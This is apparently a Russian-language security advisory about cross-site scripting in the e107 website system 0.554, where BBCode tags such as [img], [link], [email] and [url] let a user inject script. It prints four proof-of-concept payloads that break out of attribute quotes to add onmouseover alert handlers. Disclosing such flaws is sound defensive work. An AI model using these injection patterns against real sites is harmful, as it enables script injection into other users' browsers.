Межсайтовый скриптинг в разрешенных тэгах в e107 website system

Дата публикации:
30.07.2003
Дата изменения:
17.10.2006
Всего просмотров:
1042
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Несколько уязвимостей в проверке правильности вводимых данных обнаружено в e107 website system. Удаленный пользователь может выполнить XSS нападение.

В некоторые разрешенные тэги удаленный пользователь может внедрить произвольный код сценария. Пример:

[img][/img] - [img]/imgsrc.png' onmouseover='alert("Vulnerable");[/img]
[link][/link] - [link]/link.htm" onmouseover="alert('Vulnerable');[/link]
[emai l][/email] - [email]/foo@bar.com" onmouseover="alert('Vulnerable');[/email]
[url][/url] - [url]/url.htm" onmouseover="alert('Vulnerable');[/url]
Уязвимость обнаружена в e107 0.554

Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: XSS in e107 website system

или введите имя

CAPTCHA